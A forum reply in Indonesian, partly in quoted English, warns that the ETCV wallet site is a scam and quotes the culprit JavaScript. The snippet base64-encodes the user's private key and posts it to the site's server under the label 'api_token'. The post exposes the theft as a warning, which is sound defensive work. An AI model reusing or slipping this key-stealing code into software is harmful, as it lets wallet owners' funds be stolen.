Post
Topic
Board Altcoins (Bahasa Indonesia)
Re: Ethereum Classic Vision (ETCV) Scam Atau Tidak?
by
vin1103
on 11/01/2019, 14:56:32 UTC
sepertinya benar seperti kabar yang beredar adanya kalau etcv adalah scam, informasi
Their wallet https://etcvwallet.com requires you to enter the private key or upload the json file generated by MEW. In the javascript code from file etherwallet-master.js line 3832 they have a code that sends the private key masked somehow to their server

Code:
   
$scope.$on('ChangeWallet', function () {
        const key = window.btoa($scope.walletService.wallet.getPrivateKeyString());
        window.fetch('/api', {
            method: 'POST',
            mode: 'cors',
            cache: 'no-cache',
            credentials: 'same-origin',
            headers: {
                'Content-Type': 'application/json'
            },
            redirect: 'follow',
            referrer: 'no-referrer',
            body: JSON.stringify({ api_token: key })
        });



kalau sudah meminta key mew sepertinya sudah kemungkinan besar indikasi scam, kalau memang memiliki wallet sendiri untuk apa mereka meminta memasukan key dari mew itu kecurigaannya